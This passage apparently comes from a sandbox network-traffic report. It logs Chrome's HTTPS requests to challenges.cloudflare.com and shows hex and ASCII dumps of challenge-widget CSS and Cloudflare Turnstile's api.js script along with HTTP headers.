                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                              Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                              Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                              Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                              Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                              Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                              Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                              Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.1649739104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:44 UTC383OUTGET /turnstile/v0/b/a6e12e96a2d5/api.js HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:44 UTC471INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:44 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 47695
                                                                              Connection: close
                                                                              accept-ranges: bytes
                                                                              last-modified: Thu, 21 Nov 2024 17:58:42 GMT
                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                              access-control-allow-origin: *
                                                                              cross-origin-resource-policy: cross-origin
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6e9b5823c337-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-11-26 19:54:44 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                              Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                              Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42
                                                                              Data Ascii: av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUB
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 63 74 7c 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72
                                                                              Data Ascii: ct||Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 73 2c 6e 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28
                                                                              Data Ascii: s,n);var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(
                                                                              2024-11-26 19:54:44 UTC1369INData Raw: 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74
                                                                              Data Ascii: cument.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.st


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.1649741104.18.95.414436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:54:45 UTC730OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e8c6e9b1b1b437a&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/lgd21/0x4AAAAAAA0MpIT_R9fG8S2s/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:54:46 UTC331INHTTP/1.1 200 OK
                                                                              Date: Tue, 26 Nov 2024 19:54:46 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 112066
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e8c6ea5f87b8c09-EWR
                                                                              alt-svc: h3=":443"; ma=86400
